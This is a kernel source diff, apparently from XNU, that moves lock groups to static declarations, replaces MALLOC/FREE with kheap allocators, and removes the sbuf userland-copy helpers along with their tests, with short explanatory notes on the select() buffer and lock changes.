 SYSCTL_INT(_kern_eventhandler, OID_AUTO, debug, CTLFLAG_RW | CTLFLAG_LOCKED,
@@ -76,9 +74,7 @@ struct eventhandler_entry_arg eventhandler_entry_dummy_arg = { .ee_fm_uuid = { 0
 
 /* List of 'slow' lists */
 static struct eventhandler_lists_ctxt evthdlr_lists_ctxt_glb;
-static lck_grp_attr_t   *eventhandler_mutex_grp_attr;
-static lck_grp_t        *eventhandler_mutex_grp;
-static lck_attr_t       *eventhandler_mutex_attr;
+static LCK_GRP_DECLARE(eventhandler_mutex_grp, "eventhandler");
 
 static unsigned int eg_size;    /* size of eventhandler_entry_generic */
 static struct mcache *eg_cache; /* mcache for eventhandler_entry_generic */
@@ -86,9 +82,8 @@ static struct mcache *eg_cache; /* mcache for eventhandler_entry_generic */
 static unsigned int el_size;    /* size of eventhandler_list */
 static struct mcache *el_cache; /* mcache for eventhandler_list */
 
-static lck_grp_attr_t   *el_lock_grp_attr;
-lck_grp_t        *el_lock_grp;
-lck_attr_t       *el_lock_attr;
+LCK_GRP_DECLARE(el_lock_grp, "eventhandler list");
+LCK_ATTR_DECLARE(el_lock_attr, 0, 0);
 
 struct eventhandler_entry_generic {
        struct eventhandler_entry       ee;
@@ -106,7 +101,7 @@ eventhandler_lists_ctxt_init(struct eventhandler_lists_ctxt *evthdlr_lists_ctxt)
        TAILQ_INIT(&evthdlr_lists_ctxt->eventhandler_lists);
        evthdlr_lists_ctxt->eventhandler_lists_initted = 1;
        lck_mtx_init(&evthdlr_lists_ctxt->eventhandler_mutex,
-           eventhandler_mutex_grp, eventhandler_mutex_attr);
+           &eventhandler_mutex_grp, LCK_ATTR_NULL);
 }
 
 /*
@@ -115,16 +110,6 @@ eventhandler_lists_ctxt_init(struct eventhandler_lists_ctxt *evthdlr_lists_ctxt)
 void
 eventhandler_init(void)
 {
-       eventhandler_mutex_grp_attr = lck_grp_attr_alloc_init();
-       eventhandler_mutex_grp = lck_grp_alloc_init("eventhandler",
-           eventhandler_mutex_grp_attr);
-       eventhandler_mutex_attr = lck_attr_alloc_init();
-
-       el_lock_grp_attr = lck_grp_attr_alloc_init();
-       el_lock_grp = lck_grp_alloc_init("eventhandler list",
-           el_lock_grp_attr);
-       el_lock_attr = lck_attr_alloc_init();
-
        eventhandler_lists_ctxt_init(&evthdlr_lists_ctxt_glb);
 
        eg_size = sizeof(struct eventhandler_entry_generic);
@@ -385,6 +370,6 @@ eventhandler_lists_ctxt_destroy(struct eventhandler_lists_ctxt *evthdlr_lists_ct
        }
        lck_mtx_unlock(&evthdlr_lists_ctxt->eventhandler_mutex);
        lck_mtx_destroy(&evthdlr_lists_ctxt->eventhandler_mutex,
-           eventhandler_mutex_grp);
+           &eventhandler_mutex_grp);
        return;
 }
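
eventhandler_init() shrinks because the lock groups and attributes are no longer allocated at runtime: the groups become LCK_GRP_DECLARE statics (and el_lock_attr an LCK_ATTR_DECLARE), while each eventhandler_lists_ctxt still initializes and destroys its embedded mutex dynamically against the static group with LCK_ATTR_NULL. A sketch of that mixed pattern, with hypothetical names:

    /* Hedged sketch: static lock group, per-object mutex set up and torn down at runtime. */
    static LCK_GRP_DECLARE(example_mutex_grp, "example");

    struct example_ctxt {
            lck_mtx_t ex_mutex;
    };

    static void
    example_ctxt_init(struct example_ctxt *ctxt)
    {
            lck_mtx_init(&ctxt->ex_mutex, &example_mutex_grp, LCK_ATTR_NULL);
    }

    static void
    example_ctxt_destroy(struct example_ctxt *ctxt)
    {
            lck_mtx_destroy(&ctxt->ex_mutex, &example_mutex_grp);
    }
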
index 1904851455769e1bfcad2672edb83503e5fac40f..8196722e99bba6ce659c6b5d06414ab313a649d4 100644 (file)
@@ -705,147 +705,6 @@ sbuf_done(struct sbuf *s)
        return !!SBUF_ISFINISHED(s);
 }
 
-/*!
- * @function sbuf_uionew
- *
- * @brief
- * Create a new sbuf and initialize its buffer with data from the given uio.
- *
- * @param s
- * An optional existing sbuf to initialize, or NULL to allocate a new one.
- *
- * @param uio
- * The uio describing the data to populate the sbuf with.
- *
- * @param error
- * An output parameter to report any error to.
- *
- * @returns
- * The new and/or initialized sbuf, or NULL on error.  The error code is
- * reported back via @a error.
- */
-struct sbuf *
-sbuf_uionew(struct sbuf *s, struct uio *uio, int *error)
-{
-       int size;
-
-       if ((user_size_t)uio_resid(uio) > INT_MAX - 1) {
-               *error = EINVAL;
-               return NULL;
-       }
-
-       size = (int)uio_resid(uio);
-       s = sbuf_new(s, NULL, size + 1, 0);
-       if (s == NULL) {
-               *error = ENOMEM;
-               return NULL;
-       }
-
-       *error = uiomove(s->s_buf, size, uio);
-       if (*error != 0) {
-               sbuf_delete(s);
-               return NULL;
-       }
-
-       s->s_len = size;
-       *error = 0;
-
-       return s;
-}
-
-/*!
- * @function sbuf_bcopyin
- *
- * @brief
- * Append userland data to an sbuf.
- *
- * @param s
- * The sbuf.
- *
- * @param uaddr
- * The userland address of data to append to the sbuf.
- *
- * @param len
- * The length of the data to copy from userland.
- *
- * @returns
- * 0 on success or -1 on error.  Always returns -1 if the sbuf is marked as
- * overflowed.
- */
-int
-sbuf_bcopyin(struct sbuf *s, const void *uaddr, size_t len)
-{
-       if (SBUF_HASOVERFLOWED(s)) {
-               return -1;
-       }
-
-       if (len == 0) {
-               return 0;
-       }
-
-       if (-1 == sbuf_ensure_capacity(s, len)) {
-               SBUF_SETFLAG(s, SBUF_OVERFLOWED);
-               return -1;
-       }
-
-       if (copyin(CAST_USER_ADDR_T(uaddr), &s->s_buf[s->s_len], len) != 0) {
-               return -1;
-       }
-
-       s->s_len += (int)len;
-       return 0;
-}
-
-/*!
- * @function sbuf_copyin
- *
- * @brief
- * Append a userland string to an sbuf.
- *
- * @param s
- * The sbuf.
- *
- * @param uaddr
- * The userland address of the string to append to the sbuf.
- *
- * @param len
- * The maximum length of the string to copy.  If zero, the current capacity of
- * the sbuf is used.
- *
- * @returns
- * The number of bytes copied or -1 if an error occurred.  Always returns -1 if
- * the sbuf is marked as overflowed.
- */
-int
-sbuf_copyin(struct sbuf *s, const void *uaddr, size_t len)
-{
-       size_t done;
-
-       if (SBUF_HASOVERFLOWED(s)) {
-               return -1;
-       }
-
-       if (len == 0) {
-               len = sbuf_capacity(s);
-       } else if (-1 == sbuf_ensure_capacity(s, len)) {
-               return -1;
-       }
-
-       switch (copyinstr(CAST_USER_ADDR_T(uaddr), &s->s_buf[s->s_len], len + 1, &done)) {
-       case ENAMETOOLONG:
-               SBUF_SETFLAG(s, SBUF_OVERFLOWED);
-               s->s_len += done;
-               return -1;
-       case 0:
-               s->s_len += done - 1;
-               break;
-       default:
-               return -1;
-       }
-
-       return (int)done;
-}
-
 #if DEBUG || DEVELOPMENT
 
 /*
@@ -1932,258 +1791,6 @@ sysctl_sbuf_tests SYSCTL_HANDLER_ARGS
                }
        }
 
-       SBUF_TESTING("sbuf_uionew")
-       {
-               SBUF_SHOULD("reject residuals that are too large")
-               {
-                       struct sbuf *s = NULL;
-                       uio_t auio = NULL;
-                       char buf[4];
-                       int error = 0;
-
-                       buf[0] = 'A';
-                       buf[1] = 'B';
-                       buf[2] = 'C';
-                       buf[3] = 'D';
-
-                       auio = uio_create(1, 0, UIO_SYSSPACE, UIO_READ);
-                       uio_addiov(auio, (user_addr_t)buf, INT_MAX);
-
-                       s = sbuf_uionew(NULL, auio, &error);
-                       SBUF_ASSERT_EQ(NULL, s);
-                       SBUF_ASSERT_EQ(EINVAL, error);
-
-                       uio_free(auio);
-               }
-
-               SBUF_SHOULD("initialize using data described by the uio")
-               {
-                       struct sbuf *s = NULL;
-                       uio_t auio = NULL;
-                       char buf[4];
-                       int error = 0;
-
-                       buf[0] = 'A';
-                       buf[1] = 'B';
-                       buf[2] = 'C';
-                       buf[3] = 'D';
-
-                       auio = uio_create(1, 0, UIO_SYSSPACE, UIO_WRITE);
-                       uio_addiov(auio, (user_addr_t)buf, sizeof(buf));
-
-                       s = sbuf_uionew(NULL, auio, &error);
-                       SBUF_ASSERT_NE(NULL, s);
-                       SBUF_ASSERT_EQ(0, error);
-                       SBUF_ASSERT_EQ(4, s->s_len);
-                       SBUF_ASSERT_EQ('A', s->s_buf[0]);
-                       SBUF_ASSERT_EQ('B', s->s_buf[1]);
-                       SBUF_ASSERT_EQ('C', s->s_buf[2]);
-                       SBUF_ASSERT_EQ('D', s->s_buf[3]);
-
-                       sbuf_delete(s);
-                       uio_free(auio);
-               }
-
-               SBUF_SHOULD("fail gracefully for bad addresses")
-               {
-                       struct sbuf *s = NULL;
-                       uio_t auio = NULL;
-                       int error = 0;
-
-                       auio = uio_create(1, 0, UIO_USERSPACE, UIO_WRITE);
-                       uio_addiov(auio, (user_addr_t)0xdeadUL, 123);
-
-                       s = sbuf_uionew(NULL, auio, &error);
-                       SBUF_ASSERT_EQ(NULL, s);
-                       SBUF_ASSERT_NE(0, error);
-
-                       uio_free(auio);
-               }
-       }
-
-       SBUF_TESTING("sbuf_bcopyin")
-       {
-               SBUF_SHOULD("succeed when len is zero")
-               {
-                       struct sbuf *s = NULL;
-                       const void *uptr = (const void *)req->newptr;
-
-                       s = sbuf_new(NULL, NULL, 16, 0);
-                       SBUF_ASSERT_EQ(0, sbuf_bcopyin(s, uptr, 0));
-                       SBUF_ASSERT_EQ(0, s->s_len);
-
-                       sbuf_delete(s);
-               }
-
-               SBUF_SHOULD("succeed in the simple case")
-               {
-                       struct sbuf *s = NULL;
-                       const void *uptr = (const void *)req->newptr;
-                       size_t ulen = req->newlen;
-
-                       s = sbuf_new(NULL, NULL, 16, 0);
-                       SBUF_ASSERT_EQ(0, sbuf_bcopyin(s, uptr, ulen));
-                       SBUF_ASSERT_EQ(ulen, (size_t)s->s_len);
-
-                       sbuf_delete(s);
-               }
-
-               SBUF_SHOULD("fail for invalid userland addresses")
-               {
-                       struct sbuf *s = NULL;
-                       const void *uptr = (const void *)0xdeadUL;
-                       size_t ulen = req->newlen;
-
-                       s = sbuf_new(NULL, NULL, 16, 0);
-                       SBUF_ASSERT_EQ(-1, sbuf_bcopyin(s, uptr, ulen));
-                       SBUF_ASSERT_EQ(0, s->s_len);
-
-                       sbuf_delete(s);
-               }
-
-               SBUF_SHOULD("fail for kernel addresses")
-               {
-                       struct sbuf *s = NULL;
-                       const void *uptr = "abcd";
-                       size_t ulen = 4;
-
-                       s = sbuf_new(NULL, NULL, 16, 0);
-                       SBUF_ASSERT_EQ(-1, sbuf_bcopyin(s, uptr, ulen));
-                       SBUF_ASSERT_EQ(0, s->s_len);
-
-                       sbuf_delete(s);
-               }
-
-               SBUF_SHOULD("fail if we don't have capacity for a fixed-len sbuf")
-               {
-                       struct sbuf *s = NULL;
-                       const void *uptr = (const void *)req->newptr;
-                       size_t ulen = req->newlen;
-                       int len_before;
-
-                       s = sbuf_new(NULL, NULL, 16, SBUF_FIXEDLEN);
-                       SBUF_ASSERT_EQ(0, sbuf_cpy(s, "0123456789abcde"));
-                       len_before = s->s_len;
-                       SBUF_ASSERT_EQ(-1, sbuf_bcopyin(s, uptr, ulen));
-                       SBUF_ASSERT_EQ(len_before, s->s_len);
-                       SBUF_ASSERT(SBUF_ISSET(s, SBUF_OVERFLOWED));
-
-                       sbuf_delete(s);
-               }
-
-               SBUF_SHOULD("auto-extend if we don't have capacity for an auto-extend sbuf")
-               {
-                       struct sbuf *s = NULL;
-                       const void *uptr = (const void *)req->newptr;
-                       size_t ulen = req->newlen;
-                       int len_before;
-
-                       s = sbuf_new(NULL, NULL, 16, SBUF_AUTOEXTEND);
-                       SBUF_ASSERT_EQ(0, sbuf_cpy(s, "0123456789abcde"));
-                       len_before = s->s_len;
-                       SBUF_ASSERT_EQ(0, sbuf_bcopyin(s, uptr, ulen));
-                       SBUF_ASSERT_EQ(len_before + (int)ulen, s->s_len);
-                       SBUF_ASSERT_NOT(SBUF_ISSET(s, SBUF_OVERFLOWED));
-
-                       sbuf_delete(s);
-               }
-
-               SBUF_SHOULD("fail if overflowed")
-               {
-                       struct sbuf *s = NULL;
-                       const void *uptr = (const void *)req->newptr;
-                       size_t ulen = req->newlen;
-
-                       s = sbuf_new(NULL, NULL, 16, 0);
-                       SBUF_SETFLAG(s, SBUF_OVERFLOWED);
-                       SBUF_ASSERT_EQ(-1, sbuf_bcopyin(s, uptr, ulen));
-
-                       sbuf_delete(s);
-               }
-       }
-
-       SBUF_TESTING("sbuf_copyin")
-       {
-               SBUF_SHOULD("succeed in the simple case")
-               {
-                       struct sbuf *s = NULL;
-
-                       s = sbuf_new(NULL, NULL, 16, SBUF_AUTOEXTEND);
-                       SBUF_ASSERT_EQ(req->newlen + 1, sbuf_copyin(s, (const void *)req->newptr, req->newlen));
-                       SBUF_ASSERT_EQ(req->newlen, s->s_len);
-
-                       sbuf_delete(s);
-               }
-
-               SBUF_SHOULD("use the sbuf capacity if len is zero")
-               {
-                       struct sbuf *s = NULL;
-
-                       s = sbuf_new(NULL, NULL, 16, SBUF_AUTOEXTEND);
-                       SBUF_ASSERT_EQ(req->newlen + 1, sbuf_copyin(s, (const void *)req->newptr, 0));
-                       SBUF_ASSERT_EQ(req->newlen, s->s_len);
-
-                       sbuf_delete(s);
-               }
-
-               SBUF_SHOULD("fail if we can't extend the sbuf to accommodate")
-               {
-                       struct sbuf *s = NULL;
-
-                       s = sbuf_new(NULL, NULL, 16, SBUF_FIXEDLEN);
-                       SBUF_ASSERT_EQ(0, sbuf_cpy(s, "0123456789abcde"));
-                       SBUF_ASSERT_EQ(-1, sbuf_copyin(s, (const void *)req->newptr, req->newlen));
-
-                       sbuf_delete(s);
-               }
-
-               SBUF_SHOULD("auto-extend the buffer if necessary")
-               {
-                       struct sbuf *s = NULL;
-                       int len_before;
-
-                       s = sbuf_new(NULL, NULL, 16, SBUF_AUTOEXTEND);
-                       SBUF_ASSERT_EQ(0, sbuf_cpy(s, "0123456789abcde"));
-                       len_before = s->s_len;
-                       SBUF_ASSERT_NE(-1, sbuf_copyin(s, (const void *)req->newptr, req->newlen));
-                       SBUF_ASSERT_GT(len_before, s->s_len);
-
-                       sbuf_delete(s);
-               }
-
-               SBUF_SHOULD("fail if the sbuf is overflowed")
-               {
-                       struct sbuf *s = NULL;
-
-                       s = sbuf_new(NULL, NULL, 16, SBUF_AUTOEXTEND);
-                       SBUF_SETFLAG(s, SBUF_OVERFLOWED);
-                       SBUF_ASSERT_EQ(-1, sbuf_copyin(s, (const void *)req->newptr, req->newlen));
-
-                       sbuf_delete(s);
-               }
-
-               SBUF_SHOULD("fail gracefully for an invalid address")
-               {
-                       struct sbuf *s = NULL;
-
-                       s = sbuf_new(NULL, NULL, 16, SBUF_AUTOEXTEND);
-                       SBUF_ASSERT_EQ(-1, sbuf_copyin(s, (void *)0xdeadUL, req->newlen));
-
-                       sbuf_delete(s);
-               }
-
-               SBUF_SHOULD("fail gracefully for a kernel address")
-               {
-                       struct sbuf *s = NULL;
-                       const char *ptr = "abcd";
-
-                       s = sbuf_new(NULL, NULL, 16, SBUF_AUTOEXTEND);
-                       SBUF_ASSERT_EQ(-1, sbuf_copyin(s, ptr, strlen(ptr)));
-
-                       sbuf_delete(s);
-               }
-       }
-
        SBUF_TEST_END;
 }
 
index 77b32e3d47405bce68a3c2cd6c1ffd5fd7562aaf..1d88f75a81ce811fde65f7977e631e6c93065793 100644 (file)
 
 /* for entitlement check */
 #include <IOKit/IOBSD.h>
+/*
+ * If you need accounting for KM_SELECT consider using
+ * KALLOC_HEAP_DEFINE to define a view.
+ */
+#define KM_SELECT       KHEAP_DEFAULT
 
 /* XXX should be in a header file somewhere */
 extern kern_return_t IOBSDGetPlatformUUID(__darwin_uuid_t uuid, mach_timespec_t timeoutp);
@@ -1210,6 +1215,36 @@ pselect_nocancel(struct proc *p, struct pselect_nocancel_args *uap, int32_t *ret
        return err;
 }
 
+void
+select_cleanup_uthread(struct _select *sel)
+{
+       kheap_free(KHEAP_DATA_BUFFERS, sel->ibits, 2 * sel->nbytes);
+       sel->ibits = sel->obits = NULL;
+       sel->nbytes = 0;
+}
+
+static int
+select_grow_uthread_cache(struct _select *sel, uint32_t nbytes)
+{
+       uint32_t *buf;
+
+       buf = kheap_alloc(KHEAP_DATA_BUFFERS, 2 * nbytes, Z_WAITOK | Z_ZERO);
+       if (buf) {
+               select_cleanup_uthread(sel);
+               sel->ibits = buf;
+               sel->obits = buf + nbytes / sizeof(uint32_t);
+               sel->nbytes = nbytes;
+               return true;
+       }
+       return false;
+}
+
+static void
+select_bzero_uthread_cache(struct _select *sel)
+{
+       bzero(sel->ibits, sel->nbytes * 2);
+}
+
 /*
  * Generic implementation of {,p}select. Care: we type-pun uap across the two
  * syscalls, which differ slightly. The first 4 arguments (nfds and the fd sets)
@@ -1226,7 +1261,6 @@ select_internal(struct proc *p, struct select_nocancel_args *uap, uint64_t timeo
        struct uthread  *uth;
        struct _select *sel;
        struct _select_data *seldata;
-       int needzerofill = 1;
        int count = 0;
        size_t sz = 0;
 
@@ -1266,35 +1300,11 @@ select_internal(struct proc *p, struct select_nocancel_args *uap, uint64_t timeo
         * it is not a POSIX compliant error code for select().
         */
        if (sel->nbytes < (3 * ni)) {
-               int nbytes = 3 * ni;
-
-               /* Free previous allocation, if any */
-               if (sel->ibits != NULL) {
-                       FREE(sel->ibits, M_TEMP);
-               }
-               if (sel->obits != NULL) {
-                       FREE(sel->obits, M_TEMP);
-                       /* NULL out; subsequent ibits allocation may fail */
-                       sel->obits = NULL;
-               }
-
-               MALLOC(sel->ibits, u_int32_t *, nbytes, M_TEMP, M_WAITOK | M_ZERO);
-               if (sel->ibits == NULL) {
-                       return EAGAIN;
-               }
-               MALLOC(sel->obits, u_int32_t *, nbytes, M_TEMP, M_WAITOK | M_ZERO);
-               if (sel->obits == NULL) {
-                       FREE(sel->ibits, M_TEMP);
-                       sel->ibits = NULL;
+               if (!select_grow_uthread_cache(sel, 3 * ni)) {
                        return EAGAIN;
                }
-               sel->nbytes = nbytes;
-               needzerofill = 0;
-       }
-
-       if (needzerofill) {
-               bzero((caddr_t)sel->ibits, sel->nbytes);
-               bzero((caddr_t)sel->obits, sel->nbytes);
+       } else {
+               select_bzero_uthread_cache(sel);
        }
 
        /*
@@ -1347,14 +1357,14 @@ select_internal(struct proc *p, struct select_nocancel_args *uap, uint64_t timeo
                        if (waitq_set_is_valid(uth->uu_wqset)) {
                                waitq_set_deinit(uth->uu_wqset);
                        }
-                       FREE(uth->uu_wqset, M_SELECT);
+                       kheap_free(KM_SELECT, uth->uu_wqset, uth->uu_wqstate_sz);
                } else if (uth->uu_wqstate_sz && !uth->uu_wqset) {
                        panic("select: thread structure corrupt! "
                            "uu_wqstate_sz:%ld, wqstate_buf == NULL",
                            uth->uu_wqstate_sz);
                }
                uth->uu_wqstate_sz = sz;
-               MALLOC(uth->uu_wqset, struct waitq_set *, sz, M_SELECT, M_WAITOK);
+               uth->uu_wqset = kheap_alloc(KM_SELECT, sz, Z_WAITOK);
                if (!uth->uu_wqset) {
                        panic("can't allocate %ld bytes for wqstate buffer",
                            uth->uu_wqstate_sz);
@@ -1834,6 +1844,7 @@ poll_nocancel(struct proc *p, struct poll_nocancel_args *uap, int32_t *retval)
        u_int nfds = uap->nfds;
        u_int rfds = 0;
        rlim_t nofile = proc_limitgetcur(p, RLIMIT_NOFILE, TRUE);
+       size_t ni = nfds * sizeof(struct pollfd);
 
        /*
         * This is kinda bogus.  We have fd limits, but that is not
@@ -1853,8 +1864,7 @@ poll_nocancel(struct proc *p, struct poll_nocancel_args *uap, int32_t *retval)
        }
 
        if (nfds) {
-               size_t ni = nfds * sizeof(struct pollfd);
-               MALLOC(fds, struct pollfd *, ni, M_TEMP, M_WAITOK);
+               fds = kheap_alloc(KHEAP_TEMP, ni, Z_WAITOK);
                if (NULL == fds) {
                        error = EAGAIN;
                        goto out;
@@ -1979,9 +1989,7 @@ done:
        }
 
 out:
-       if (NULL != fds) {
-               FREE(fds, M_TEMP);
-       }
+       kheap_free(KHEAP_TEMP, fds, ni);
 
        kqueue_dealloc(kq);
        return error;
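
select_grow_uthread_cache() above folds the two separate M_TEMP allocations for the input and output fd-set bitmaps into one zeroed KHEAP_DATA_BUFFERS allocation of 2 * nbytes, split in half by pointer arithmetic, and poll_nocancel() hoists ni so the same byte count reaches kheap_free(). A small sketch of the split (the wrapper name and the 96-byte value are illustrative only):

    static void
    select_cache_layout_example(void)
    {
            uint32_t  nbytes = 96;          /* illustrative: 3 * ni for some nfds */
            uint32_t *buf;

            buf = kheap_alloc(KHEAP_DATA_BUFFERS, 2 * nbytes, Z_WAITOK | Z_ZERO);
            if (buf == NULL) {
                    return;                 /* select_internal() returns EAGAIN here */
            }
            uint32_t *ibits = buf;                               /* first nbytes bytes  */
            uint32_t *obits = buf + nbytes / sizeof(uint32_t);   /* second nbytes bytes */
            /* ... ibits/obits serve as the in/out fd-set bitmaps ... */
            (void)ibits;
            (void)obits;
            kheap_free(KHEAP_DATA_BUFFERS, buf, 2 * nbytes);
    }
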
@@ -3231,15 +3239,21 @@ SYSCTL_PROC(_machdep_remotetime, OID_AUTO, conversion_params,
 #endif /* CONFIG_MACH_BRIDGE_RECV_TIME */
 
 #if DEVELOPMENT || DEBUG
-#if __AMP__
+
 #include <pexpert/pexpert.h>
 extern int32_t sysctl_get_bound_cpuid(void);
-extern void sysctl_thread_bind_cpuid(int32_t cpuid);
+extern kern_return_t sysctl_thread_bind_cpuid(int32_t cpuid);
 static int
 sysctl_kern_sched_thread_bind_cpu SYSCTL_HANDLER_ARGS
 {
 #pragma unused(oidp, arg1, arg2)
 
+       /*
+        * DO NOT remove this bootarg guard or make this non-development.
+        * This kind of binding should only be used for tests and
+        * experiments in a custom configuration, never shipping code.
+        */
+
        if (!PE_parse_boot_argn("enable_skstb", NULL, 0)) {
                return ENOENT;
        }
@@ -3254,7 +3268,15 @@ sysctl_kern_sched_thread_bind_cpu SYSCTL_HANDLER_ARGS
        }
 
        if (changed) {
-               sysctl_thread_bind_cpuid(new_value);
+               kern_return_t kr = sysctl_thread_bind_cpuid(new_value);
+
+               if (kr == KERN_NOT_SUPPORTED) {
+                       return ENOTSUP;
+               }
+
+               if (kr == KERN_INVALID_VALUE) {
+                       return ERANGE;
+               }
        }
 
        return error;
@@ -3263,6 +3285,7 @@ sysctl_kern_sched_thread_bind_cpu SYSCTL_HANDLER_ARGS
 SYSCTL_PROC(_kern, OID_AUTO, sched_thread_bind_cpu, CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_LOCKED,
     0, 0, sysctl_kern_sched_thread_bind_cpu, "I", "");
 
+#if __AMP__
 extern char sysctl_get_bound_cluster_type(void);
 extern void sysctl_thread_bind_cluster_type(char cluster_type);
 static int
@@ -3404,6 +3427,12 @@ SYSCTL_INT(_kern, OID_AUTO, sched_edge_migrate_ipi_immediate, CTLFLAG_RW | CTLFL
 #endif /* CONFIG_SCHED_EDGE */
 
 #endif /* __AMP__ */
+
+/* used for testing by exception_tests */
+extern uint32_t ipc_control_port_options;
+SYSCTL_INT(_kern, OID_AUTO, ipc_control_port_options,
+    CTLFLAG_RD | CTLFLAG_LOCKED, &ipc_control_port_options, 0, "");
+
 #endif /* DEVELOPMENT || DEBUG */
 
 extern uint32_t task_exc_guard_default;
index d44ad74bfc13682c56413207d048dbb1706fb84f..2889c101961af691b31497e0e6952ab64298e8e2 100644 (file)
@@ -433,8 +433,8 @@ kpersona_find_syscall(user_addr_t infop, user_addr_t idp, user_addr_t idlenp)
        login = kinfo.persona_name[0] ? kinfo.persona_name : NULL;
 
        if (u_idlen > 0) {
-               MALLOC(persona, struct persona **, sizeof(*persona) * u_idlen,
-                   M_TEMP, M_WAITOK | M_ZERO);
+               persona = kheap_alloc(KHEAP_TEMP, sizeof(*persona) * u_idlen,
+                   Z_WAITOK | Z_ZERO);
                if (!persona) {
                        error = ENOMEM;
                        goto out;
@@ -465,7 +465,7 @@ out:
                for (size_t i = 0; i < u_idlen; i++) {
                        persona_put(persona[i]);
                }
-               FREE(persona, M_TEMP);
+               kheap_free(KHEAP_TEMP, persona, sizeof(*persona) * u_idlen);
        }
 
        (void)copyout(&k_idlen, idlenp, sizeof(u_idlen));
index 6a773e4952439dde64b565c6d31c17352fb10ff9..ed84e0ab586957c972de56cfecfa8b1a6079782e 100644 (file)
 #include <kern/assert.h>
 #include <kern/debug.h>
 
-#if OS_REASON_DEBUG
-#include <pexpert/pexpert.h>
-
-extern int os_reason_debug_disabled;
-#endif
-
 extern int maxproc;
 
 /*
@@ -52,25 +46,9 @@ static ZONE_DECLARE(os_reason_zone, "os reasons",
 
 os_refgrp_decl(static, os_reason_refgrp, "os_reason", NULL);
 
-#define OS_REASON_RESERVE_COUNT 100
-
 static int os_reason_alloc_buffer_internal(os_reason_t cur_reason, uint32_t osr_bufsize,
     zalloc_flags_t flags);
 
-void
-os_reason_init(void)
-{
-       int reasons_allocated = 0;
-
-       /*
-        * We pre-fill the OS reason zone to reduce the likelihood that
-        * the jetsam thread and others block when they create an exit
-        * reason.
-        */
-       reasons_allocated = zfill(os_reason_zone, OS_REASON_RESERVE_COUNT);
-       assert(reasons_allocated >= OS_REASON_RESERVE_COUNT);
-}
-
 /*
  * Creates a new reason and initializes it with the provided reason
  * namespace and code. Also sets up the buffer and kcdata_descriptor
index c2802385f84be77091ab56eb28bf18617748c51a..3d55687cddae40b79b912750be71003a31846dbe 100644 (file)
 536    AUE_NULL        ALL     { int shared_region_map_and_slide_2_np(uint32_t files_count, const struct shared_file_np *files, uint32_t mappings_count, const struct shared_file_mapping_slide_np *mappings) NO_SYSCALL_STUB; }
 537    AUE_NULL        ALL { int pivot_root(const char *new_rootfs_path_before, const char *old_rootfs_path_after); }
 538 AUE_TASKINSPECTFORPID      ALL { int task_inspect_for_pid(mach_port_name_t target_tport, int pid, mach_port_name_t *t); }
-539 AUE_TASKINSPECTFORPID      ALL { int task_read_for_pid(mach_port_name_t target_tport, int pid, mach_port_name_t *t); }
+539 AUE_TASKREADFORPID ALL { int task_read_for_pid(mach_port_name_t target_tport, int pid, mach_port_name_t *t); }
 540    AUE_PREADV      ALL     { user_ssize_t sys_preadv(int fd, struct iovec *iovp, int iovcnt, off_t offset); }
 541    AUE_PWRITEV     ALL     { user_ssize_t sys_pwritev(int fd, struct iovec *iovp, int iovcnt, off_t offset); }
 542    AUE_PREADV      ALL     { user_ssize_t sys_preadv_nocancel(int fd, struct iovec *iovp, int iovcnt, off_t offset) NO_SYSCALL_STUB; }
index 5769cf276851aa1f434374319be7b62d219e1d43..afddde8c280ddc1175635dac66e7caa43267c3d4 100644 (file)
@@ -103,17 +103,12 @@ struct msgmap           *msgmaps;       /* MSGSEG msgmap structures */
 struct msg              *msghdrs;       /* MSGTQL msg headers */
 struct msqid_kernel     *msqids;        /* MSGMNI msqid_kernel structs (wrapping user_msqid_ds structs) */
 
-static lck_grp_t       *sysv_msg_subsys_lck_grp;
-static lck_grp_attr_t  *sysv_msg_subsys_lck_grp_attr;
-static lck_attr_t      *sysv_msg_subsys_lck_attr;
-static lck_mtx_t        sysv_msg_subsys_mutex;
+static LCK_GRP_DECLARE(sysv_msg_subsys_lck_grp, "sysv_msg_subsys_lock");
+static LCK_MTX_DECLARE(sysv_msg_subsys_mutex, &sysv_msg_subsys_lck_grp);
 
 #define SYSV_MSG_SUBSYS_LOCK() lck_mtx_lock(&sysv_msg_subsys_mutex)
 #define SYSV_MSG_SUBSYS_UNLOCK() lck_mtx_unlock(&sysv_msg_subsys_mutex)
 
-void sysv_msg_lock_init(void);
-
-
 #ifdef __APPLE_API_PRIVATE
 int     msgmax,                 /* max chars in a message */
     msgmni,                     /* max message queue identifiers */
@@ -131,18 +126,6 @@ struct msginfo msginfo = {
 };
 #endif /* __APPLE_API_PRIVATE */
 
-/* Initialize the mutex governing access to the SysV msg subsystem */
-__private_extern__ void
-sysv_msg_lock_init( void )
-{
-       sysv_msg_subsys_lck_grp_attr = lck_grp_attr_alloc_init();
-
-       sysv_msg_subsys_lck_grp = lck_grp_alloc_init("sysv_msg_subsys_lock", sysv_msg_subsys_lck_grp_attr);
-
-       sysv_msg_subsys_lck_attr = lck_attr_alloc_init();
-       lck_mtx_init(&sysv_msg_subsys_mutex, sysv_msg_subsys_lck_grp, sysv_msg_subsys_lck_attr);
-}
-
 static __inline__ user_time_t
 sysv_msgtime(void)
 {
@@ -252,30 +235,27 @@ msginit(__unused void *dummy)
         * if this fails, fail safely and leave it uninitialized (related
         * system calls will fail).
         */
-       msgpool = (char *)_MALLOC(msginfo.msgmax, M_SHM, M_WAITOK);
+       msgpool = kheap_alloc(KHEAP_DATA_BUFFERS, msginfo.msgmax, Z_WAITOK);
        if (msgpool == NULL) {
                printf("msginit: can't allocate msgpool");
                goto bad;
        }
-       MALLOC(msgmaps, struct msgmap *,
-           sizeof(struct msgmap) * msginfo.msgseg,
-           M_SHM, M_WAITOK);
+       msgmaps = kheap_alloc(KM_SHM, sizeof(struct msgmap) * msginfo.msgseg,
+           Z_WAITOK);
        if (msgmaps == NULL) {
                printf("msginit: can't allocate msgmaps");
                goto bad;
        }
 
-       MALLOC(msghdrs, struct msg *,
-           sizeof(struct msg) * msginfo.msgtql,
-           M_SHM, M_WAITOK);
+       msghdrs = kheap_alloc(KM_SHM, sizeof(struct msg) * msginfo.msgtql,
+           Z_WAITOK);
        if (msghdrs == NULL) {
                printf("msginit: can't allocate msghdrs");
                goto bad;
        }
 
-       MALLOC(msqids, struct msqid_kernel *,
-           sizeof(struct msqid_kernel) * msginfo.msgmni,
-           M_SHM, M_WAITOK);
+       msqids = kheap_alloc(KM_SHM,
+           sizeof(struct msqid_kernel) * msginfo.msgmni, Z_WAITOK);
        if (msqids == NULL) {
                printf("msginit: can't allocate msqids");
                goto bad;
